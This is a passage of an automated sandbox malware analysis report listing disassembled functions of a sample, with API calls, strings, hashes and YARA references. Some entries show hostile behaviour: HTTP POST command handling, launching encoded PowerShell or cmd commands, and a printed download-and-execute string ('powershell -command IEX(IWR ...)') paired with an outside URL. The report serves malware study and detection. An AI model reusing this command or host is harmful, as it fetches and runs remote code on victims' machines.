Opcode Fuzzy Hash: a78e651893f0602abf76837badfdcc0b773ba160a2e73228329d6a72d34d144a
Instruction Fuzzy Hash: DBE08C31000998AFCF152F14EE48D883B6BEB45342F000014F904CA231CF35DD82CF94

Function 0062E87D Relevance: 1.8, APIs: 1, Instructions: 274COMMONLIBRARYCODE

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,0062E878,?,?,00000008,?,?,0062E510,00000000), ref: 0062EAAA

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 43db58247c66ad18bfaf801ff97d261ab94e777afdfc52aec011453bc7654c64
Instruction ID: d02e4e51cf944abb9613be3cb9dbdf20e98608549e409ebcca1f7e172eec13ff
Opcode Fuzzy Hash: 43db58247c66ad18bfaf801ff97d261ab94e777afdfc52aec011453bc7654c64
Instruction Fuzzy Hash: 77B13E31610A15CFD714CF28D486BA57BA2FF45365F258669E89ACF3A1C336E982CF40

Function 006244C5 Relevance: 1.6, APIs: 1, Instructions: 147COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 006244DB

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: FeaturePresentProcessor
String ID:
API String ID: 2325560087-0
Opcode ID: 1346204d2c13dff70d855fab18a89243147194ba43bf13d2993e2f4aa3949a4e
Instruction ID: b4ae6b77a4ff2a55f766af30913a5e6bc07a313ac4fd0ac26a3ef7ef13a83393
Opcode Fuzzy Hash: 1346204d2c13dff70d855fab18a89243147194ba43bf13d2993e2f4aa3949a4e
Instruction Fuzzy Hash: 94518CB1A017158FDB28CF59E9817EABBF2FB48314F14982AE441EB350DBB59944CF90

Function 00E424E0 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00E424E2

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: CountTick
String ID:
API String ID: 536389180-0
Opcode ID: 3445fdb7ea8f35b76b36b59f87d88b4e0c2d70e1ace742fe011673a6ed87bcb3
Instruction ID: e2715a84b87ad5e592790bad07458c17343402fa52b7ca6398edc4d0ecd5c8e1
Opcode Fuzzy Hash: 3445fdb7ea8f35b76b36b59f87d88b4e0c2d70e1ace742fe011673a6ed87bcb3
Instruction Fuzzy Hash: 8131627A3504018FD74CCF2EEC9962973E1F78A320759523AE536E72A0D6B4A8978B41

Function 006243AF Relevance: 1.5, APIs: 1, Instructions: 3COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000043BB,00623BBB), ref: 006243B4

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: fb490ced2e5323b134ea85c9e18ef4e5a545ff99d5d98a760a239611d980ac54
Instruction ID: c999fb0acd144bd4cb260b4e319fdc237fccb428acb87b1909535a04b1907028
Opcode Fuzzy Hash: fb490ced2e5323b134ea85c9e18ef4e5a545ff99d5d98a760a239611d980ac54
Instruction Fuzzy Hash:

Function 00E47480 Relevance: 1.4, Strings: 1, Instructions: 159COMMON

Download Yara Rule

Strings

0, xrefs: 00E474E0

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: ac3afc3d4a7e14a933ee7a0f1553ef86ce682994d07fd3c4d5a318ec47837b3a
Instruction ID: 46ac02beb6a18df15ed1ba0f985819c80c001d29532e58142c9ae043bdc3ac85
Opcode Fuzzy Hash: ac3afc3d4a7e14a933ee7a0f1553ef86ce682994d07fd3c4d5a318ec47837b3a
Instruction Fuzzy Hash: AB51A331E183D84EDB1D8BED58542FCBFB19F56200F5441AED89ABB643C6284A49CBA1

Function 0062A845 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 0062A845

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 6474ba5225f2a436f585c8f922716ca69a7f800ea25503503b4b68d89d4ed2c1
Instruction ID: 5b64362b9a3fc606b96897aba225b21ede34fddf655dd7ce5ab74a0242f9282c
Opcode Fuzzy Hash: 6474ba5225f2a436f585c8f922716ca69a7f800ea25503503b4b68d89d4ed2c1
Instruction Fuzzy Hash: C5A011302002808B83008F30AA0A2883BEAAB02A803002028A008CA220EB208080AAA2

Function 00E446A0 Relevance: .8, Instructions: 750COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2305b5298d3a25e8921cda305a5ed4179c8203550299ed11d42086bee319de36
Instruction ID: 97161c069c7244e94fdef35dc2fbfea6b8dfe427544334bd16c5bb761703d1ee
Opcode Fuzzy Hash: 2305b5298d3a25e8921cda305a5ed4179c8203550299ed11d42086bee319de36
Instruction Fuzzy Hash: A5725D3492419C8EDB1DEB64E8656EC7775BF26300F8421FDE54A32563EB311A89CF60

Function 00E442A0 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
Instruction ID: 30c601da28732d0c86addaa5ccfa9ad3a7112a4d71085d051946d182f3a63628
Opcode Fuzzy Hash: c7296c3b1dbb1a921ba32d64bab04859c0bfcd0fa31f9d19202da488f17fec2c
Instruction Fuzzy Hash: D95164B1A11A10CFCB68CF2EC591556BBF1BF8C324355896EA98ACB625E334F840CF51

Function 00629763 Relevance: .0, Instructions: 22COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
Instruction ID: e9cb4df04fee7205c4a2c7099565362094ab770b52eef65535d5c92fd8c2a761
Opcode Fuzzy Hash: fe8cb0350e4e3b143060300173f47f5aae99c96b2ead98911347758da5d435a3
Instruction Fuzzy Hash: E6E04F72921538EBCB14DB88950498AB3ADF784B40B15445AB501D3101C270DE00DBD4

Function 00E47D90 Relevance: 61.6, APIs: 21, Strings: 14, Instructions: 350
libraryloadersleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 00E47DB6
GetTickCount64.KERNEL32 ref: 00E47DC4

Part of subcall function 00E466E0: ObtainUserAgentString.URLMON(00000000,?,?), ref: 00E46702
Part of subcall function 00E466E0: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 00E46722
Part of subcall function 00E466E0: InternetOpenW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E46788
Part of subcall function 00E466E0: InternetSetOptionW.WININET(00000000,00000002,0000EA60,00000004), ref: 00E467C1
Part of subcall function 00E466E0: InternetConnectW.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E467DE
Part of subcall function 00E466E0: HttpOpenRequestW.WININET(00000000,POST,?,00000000,00000000,00000000,80403000,00000000), ref: 00E46817
Part of subcall function 00E466E0: InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00E46840

Sleep.KERNEL32(00000000), ref: 00E47E16
lstrcmpA.KERNEL32(00000000,INIT), ref: 00E47E23
StrToIntA.SHLWAPI(00000000), ref: 00E47EE6
StrToIntA.SHLWAPI(00000000), ref: 00E47F2B
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00E47F67
PathCombineW.SHLWAPI(?,?,WindowsPowerShell\v1.0\powershell.exe), ref: 00E47F80
wnsprintfW.SHLWAPI ref: 00E47F94
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 00E47FD0
wnsprintfW.SHLWAPI ref: 00E47FE4

Part of subcall function 00E45650: GetProcessHeap.KERNEL32(00000000,00000000,00E48335), ref: 00E45657
Part of subcall function 00E45650: HeapFree.KERNEL32(00000000), ref: 00E4565E

GetModuleHandleA.KERNEL32(kernel32), ref: 00E48007
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00E48015
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00E4802A
LoadLibraryA.KERNEL32(shell32,ShellExecuteW), ref: 00E4808B
GetProcAddress.KERNEL32(00000000), ref: 00E48092
wsprintfA.USER32 ref: 00E480F2
wnsprintfA.SHLWAPI ref: 00E4811E

Part of subcall function 00E42790: GetProcessHeap.KERNEL32(00000008,?), ref: 00E427A2
Part of subcall function 00E42790: HeapAlloc.KERNEL32(00000000), ref: 00E427A9

Sleep.KERNEL32(00000000), ref: 00E48346

Strings

%ComSpec%, xrefs: 00E47FCB
shell32, xrefs: 00E48086
%d|%s|%.16s|, xrefs: 00E480EC
kernel32, xrefs: 00E47FF4
ShellExecuteW, xrefs: 00E48081
/c %S, xrefs: 00E47FDA
WindowsPowerShell\v1.0\powershell.exe, xrefs: 00E47F6D
Wow64RevertWow64FsRedirection, xrefs: 00E4801B
%d|%s, xrefs: 00E47DB0
Wow64DisableWow64FsRedirection, xrefs: 00E4800F
%s|%s, xrefs: 00E48114
INIT, xrefs: 00E47E1D
open, xrefs: 00E480A0
-enc %S, xrefs: 00E47F8A

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: HeapInternet$AddressProcwnsprintf$OpenOptionProcessSleepwsprintf$AgentAllocByteCharCombineConnectCount64DirectoryEnvironmentExpandFreeHandleHttpLibraryLoadModuleMultiObtainPathQueryRequestStringStringsSystemTickUserWidelstrcmp
String ID: -enc %S$ /c %S$%ComSpec%$%d|%s$%d|%s|%.16s|$%s|%s$INIT$ShellExecuteW$WindowsPowerShell\v1.0\powershell.exe$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32$open$shell32
API String ID: 1920831074-1153165106
Opcode ID: f56512be809df7de3f62dda229553e2bf6fb6cce2d4d9030a28d4cd096d8a8c0
Instruction ID: 40dfc0118c18327881a0f5bc771486e4c84a6abf0485944998fab670252c95a1
Opcode Fuzzy Hash: f56512be809df7de3f62dda229553e2bf6fb6cce2d4d9030a28d4cd096d8a8c0
Instruction Fuzzy Hash: A8C1C071E00208ABCB14EFB4EC85AEEB7F9AF44300F511169F516B7291EB749E09CB95

Function 00622AE0 Relevance: 37.0, APIs: 3, Strings: 18, Instructions: 276
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080

Part of subcall function 006226F0: operator!=.LIBCPMTD ref: 006227B9
Part of subcall function 006226F0: task.LIBCPMTD ref: 006227CA
Part of subcall function 006226F0: task.LIBCPMTD ref: 006227D9

Part of subcall function 00622870: task.LIBCPMTD ref: 00622889

Part of subcall function 00622A60: task.LIBCPMTD ref: 00622AB3
Part of subcall function 00622A60: task.LIBCPMTD ref: 00622AC2

task.LIBCPMTD ref: 00622C96

Part of subcall function 00622450: task.LIBCPMTD ref: 006224E6
Part of subcall function 00622450: task.LIBCPMTD ref: 006224F2
Part of subcall function 00622450: task.LIBCPMTD ref: 006224FE
Part of subcall function 00622450: task.LIBCPMTD ref: 0062250A
Part of subcall function 00622450: task.LIBCPMTD ref: 00622519

Part of subcall function 00621BD0: task.LIBCPMTD ref: 00621C63
Part of subcall function 00621BD0: task.LIBCPMTD ref: 00621C72

Part of subcall function 00621D30: operator!=.LIBCPMTD ref: 00621DB9
Part of subcall function 00621D30: task.LIBCPMTD ref: 00621DC7
Part of subcall function 00621D30: task.LIBCPMTD ref: 00621DD6

Part of subcall function 00621E90: task.LIBCPMTD ref: 00621F50
Part of subcall function 00621E90: task.LIBCPMTD ref: 00621F5F

Part of subcall function 00621FF0: task.LIBCPMTD ref: 0062204A
Part of subcall function 00621FF0: task.LIBCPMTD ref: 00622056
Part of subcall function 00621FF0: task.LIBCPMTD ref: 00622065

Part of subcall function 00622090: task.LIBCPMTD ref: 006220E6

task.LIBCPMTD ref: 00622E58
task.LIBCPMTD ref: 00622EFC

Part of subcall function 006221A0: operator!=.LIBCPMTD ref: 00622294
Part of subcall function 006221A0: task.LIBCPMTD ref: 006222A5
Part of subcall function 006221A0: task.LIBCPMTD ref: 006222B4

Strings

cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho, xrefs: 00622E11
shtumcttjzvhu, xrefs: 00622E65
brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis, xrefs: 00622E7E
syntqwezljesnhnfjaztdeotfzpejojodftab, xrefs: 00622EB0
rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb, xrefs: 00622C52
yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy, xrefs: 00622E36
fuisqwdbksjnkwghhwh, xrefs: 00622CC8
gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa, xrefs: 00622D71
upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs, xrefs: 00622B5E
ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund, xrefs: 00622C12
jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu, xrefs: 00622D8A
bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs, xrefs: 00622BAF
nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs, xrefs: 00622DA3
gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj, xrefs: 00622ECF
bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg, xrefs: 00622CFB
sqfyhcibiyaixyvseuhuztdlx, xrefs: 00622C6B
rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo, xrefs: 00622DE8
jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd, xrefs: 00622E97

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: task$operator!=$char_traits
String ID: bbiubmprfbqjoqmoqgmhttblufpjlpiycsqtnqcoidbvmqtfgcahfg$bfbkxdptzcljwinnfpjguspcvlgirgvdegdeqisttxcrywkudyppsifzvxs$brdvmbhfixnfjkixadthcpzymiljlvidbiypcfxqaqvxdznkshnertbatlamlvhvlgiqevborbhuzis$ckedhkwnzqenzdyullzbnlnfpdmbxpbrmyhyhqfwzycsbmtpacpudhvlrkopimgkhhund$cynilnsopurpkzljbcyibniozvcvlhljsiueoaxlduusesgcbvealyqlqegiho$fuisqwdbksjnkwghhwh$gcgcdlmeebjfufktvnrctczymerylzxsfqamppfwqjtheyqzdwlhj$gcwignkebqvuaflqwaofoeamhtzhtayjmihwxiltntgdrauzzhbrgaocoaklskbiaxlskzepppflnzfykkxivzoa$jlsnfghtfqpdrihxdjmbpgukkyazsxnkrrfoklsrhiihyccjuobgwyiscunlu$jreqifbqorpfxictktaxizwicpwxilbgtncfyasmvhfyvtkowlhcd$nuotrqlghjnffzskkcwufalzlmyscmjdepuxlmxsvppqivxsccetooswpjxeizyhfgqglaeuxevfergpdysqykuppgggs$rhfqtvjgvstrbnxfbnisqywuttgleakvwhpeikxktmpncjovllsttlwtunsrbejgntaohynvb$rvoctmqczfvawqbqstoqximnlajullkwbhpoyeksejkprviaewktleabpmhofo$shtumcttjzvhu$sqfyhcibiyaixyvseuhuztdlx$syntqwezljesnhnfjaztdeotfzpejojodftab$upwxgfoqwdhvhqqbodaeivuwrsbjowftepjuayrfsskdseaqlqzsrzyylrwhxudritnoznhlmmukgfgilepjjfsxufyryctzs$yavuryeiymqfxujpmpqrmrmgttalagszlfjtclxxzlbqegipvgwbufy
API String ID: 1022754510-231213261
Opcode ID: a233d626034d585d238f95dc3321092859ecf0bbb947e389b7a1adf609c7bcaa
Instruction ID: 846ce5d649e43315782e841156d0f3dc35f0498528e3bb98b536d55d7288439d
Opcode Fuzzy Hash: a233d626034d585d238f95dc3321092859ecf0bbb947e389b7a1adf609c7bcaa
Instruction Fuzzy Hash: 90B13C70E10B18AADB40FF78DD17B9EBBB2AB16B00F40425DF5413B281DB7516448BE6

Function 006221A0 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158COMMON

Download Yara Rule

APIs

Part of subcall function 00623040: char_traits.LIBCPMTD ref: 00623080

operator!=.LIBCPMTD ref: 00622294
task.LIBCPMTD ref: 006222A5
task.LIBCPMTD ref: 006222B4

Strings

oyr, xrefs: 006221F6
-, xrefs: 006223C5
lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa, xrefs: 006221E5
ianh, xrefs: 006221D1, 0062234E, 00622374
P, xrefs: 00622326
[, xrefs: 00622301

Memory Dump Source

Source File: 00000000.00000002.1723649532.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true

Associated: 00000000.00000002.1723634515.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723666003.0000000000631000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723679129.0000000000638000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1723691348.000000000063A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_tcmeimnnMZ.jbxd

Similarity

API ID: task$char_traitsoperator!=
String ID: -$P$[$ianh$lgorocmtlicgntojuhnxsyvwoxnzmsynfanydnuerqa$oyr
API String ID: 2802545854-2318821752
Opcode ID: 1bb3737d94369ae34245dce052da00f6442f8cda9f665df5f32ae237be090a8d
Instruction ID: 8b099d15119472304c5cade76087a6cc695b02a6fddbbbeba44b7b07c39d37f2
Opcode Fuzzy Hash: 1bb3737d94369ae34245dce052da00f6442f8cda9f665df5f32ae237be090a8d
Instruction Fuzzy Hash: F0716A70D04A78DADB24DB64D965BDEBBB2BF10304F10809DE045A7282DB791F89DF51

Function 00E48570 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 69stringCOMMON

Download Yara Rule

APIs

ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe,?,00000104), ref: 00E48591
ExpandEnvironmentStringsW.KERNEL32(%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe,?,00000104), ref: 00E485A4
ExpandEnvironmentStringsW.KERNEL32(%ComSpec%,?,00000104), ref: 00E485B7
GetFileAttributesW.KERNEL32(?), ref: 00E485DD
GetFileAttributesW.KERNEL32(?), ref: 00E485F6
lstrcpyW.KERNEL32(00000000,sd4.ps1), ref: 00E4860D
wnsprintfW.SHLWAPI ref: 00E48630
ShellExecuteW.SHELL32(00000000,open,?,?,00000000,00000000), ref: 00E48652

Strings

%ComSpec%, xrefs: 00E485B2
sd4.ps1, xrefs: 00E48601
sd2.ps1, xrefs: 00E485E8
open, xrefs: 00E4864B
%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe, xrefs: 00E4858C
/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')", xrefs: 00E4861F
%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe, xrefs: 00E4859F
https://kionaonline.com/modules/bonslick, xrefs: 00E4861A

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings$AttributesFile$ExecuteShelllstrcpywnsprintf
String ID: %ComSpec%$%SYSTEMROOT%\Microsoft.NET\Framework\v2.0.50727\csc.exe$%SYSTEMROOT%\Microsoft.NET\Framework\v4.0.30319\csc.exe$/c "powershell -command IEX(IWR -UseBasicParsing '%s/%s')"$https://kionaonline.com/modules/bonslick$open$sd2.ps1$sd4.ps1
API String ID: 4132772799-999334212
Opcode ID: 44db291f95c248d3c480ca1956c5c62045cbf4b76aa6aa14624abd955146c0e2
Instruction ID: 2cda27731da10a038720e81c73d395718d2632325901e39899e4cfcbc82dbadb
Opcode Fuzzy Hash: 44db291f95c248d3c480ca1956c5c62045cbf4b76aa6aa14624abd955146c0e2
Instruction Fuzzy Hash: F821A57594031CAEDF20D768AC45FEA776CEB09714F0015D1EA58F20D0DBB4AAC98F91

Function 00E45720 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 167memorypipeprocessCOMMON

Download Yara Rule

APIs

CreatePipe.KERNEL32(?,?,?,00000000), ref: 00E45753
CreateProcessW.KERNEL32(?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E457B1
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E457C4
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E457C9
WaitForSingleObject.KERNEL32(00000000,0000EA60,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E457E0
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E457F7
ReadFile.KERNEL32(?,?,?,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E45834
GetProcessHeap.KERNEL32(00000008,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E4585F
HeapAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E45862
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E4586D
HeapReAlloc.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E45870
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E458C7
CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E458E3
CloseHandle.KERNEL32(00000000,?,?,00000000,00000000,00000001,00000010,00000000,00000000,00000044,00000000), ref: 00E458E8

Strings

D, xrefs: 00E45776

Memory Dump Source

Source File: 00000000.00000002.1723838379.0000000000E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 00E40000, based on PE: true

Associated: 00000000.00000002.1723828498.0000000000E40000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1723850417.0000000000E4B000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e40000_tcmeimnnMZ.jbxd

Yara matches

Similarity

API ID: CloseHandleHeap$PipeProcess$AllocCreateNamedPeek$FileObjectReadSingleWait
String ID: D
API String ID: 2337985897-2746444292
Opcode ID: 1c3c06781e62bd852d3f9c52370b66bdf8fdab5e5eb2a7a8cea97b66b018aa5c
Instruction ID: 865cef9d62f17c6f624f1422660a420f320193b8c6565538967e6cd97326362e
